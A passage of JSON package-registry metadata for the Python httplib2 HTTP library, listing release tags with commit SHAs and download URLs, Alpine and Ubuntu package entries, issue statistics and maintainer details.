30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T15:19:08.819Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.23","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":119,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2026-03-01T08:09:20.311Z","updated_at":"2026-03-01T08:09:20.311Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.23","url":"https://pkgs.alpinelinux.org/packages?branch=v3.23","ecosystem":"alpine","default":false,"packages_count":27576,"maintainers_count":428,"namespaces_count":2,"keywords_count":189,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1051},"icon_url":"https://github.com/alpinelinux.png","created_at":"2026-01-24T14:35:50.739Z","updated_at":"2026-08-25T05:04:59.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/namespaces"}},{"id":13469511,"name":"python-httplib2","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-09T19:58:18.975Z","latest_release_published_at":"2026-02-09T19:58:18.975Z","latest_release_number":"0.20.4-3","last_synced_at":"2026-03-09T20:09:30.037Z","created_at":"2026-02-09T19:58:18.525Z","updated_at":"2026-08-21T16:25:00.773Z","registry_url":"https://launchpad.net/ubuntu/+source/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-httplib2","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-cryptography \u003c!nocheck\u003e, python3-pyparsing \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-timeout \u003c!nocheck\u003e, python3-six \u003c!nocheck\u003e, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"db